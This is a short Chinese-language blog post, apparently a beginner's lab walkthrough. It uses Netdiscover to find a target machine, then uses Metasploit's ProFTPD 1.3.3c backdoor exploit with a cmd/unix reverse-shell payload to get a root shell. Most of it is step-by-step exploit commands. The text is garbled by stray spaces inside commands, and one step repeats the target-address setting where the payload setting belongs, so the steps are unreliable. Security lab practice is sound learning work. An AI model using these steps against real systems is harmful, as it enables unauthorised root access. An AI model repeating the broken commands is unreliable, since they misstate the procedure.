本文介绍了如何通过Netdiscover进行二层网络发现,以及如何在Msfconsole中利用proftpd_133cbackdoor漏洞获取靶机IP,设置payload获取root权限的过程。适合网络安全初学者学习。
这次我们使用一种新方法查看靶机的ip
Netdiscover:二层发现工具,拥有主动和被动发现两种方式。
首先查看靶机的ip
然后查看本机的ip,使用ipconfig
然后扫描靶机ip
Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用.
操作流程
1.搜索利用脚本: search
2.进入利用脚本: use exploit/unix/ftp/proftpd _133c backdoor
3.查看需要设置的参数: show opt ions
4.设置参数: set rhost 192. 168.1.4
5.设置pay load:
set payload cmd/ uni x/reverse
6.查看payload需要设置的参数: show opt ions
7.设置payload参数: set rhost 192. 168. 1. 4
8.输入命令:
run,执行攻击,成功getshell, 并且直接为r oot权限
显示参数show options
set payload
主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等,payloads也被称为shellcode。
一般在exploit中调用payload
也可以使用 generate 命令直接生成payload
然后run
到这里我们就找到root权限了
网安初学者欢迎批评指正!!!
781
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
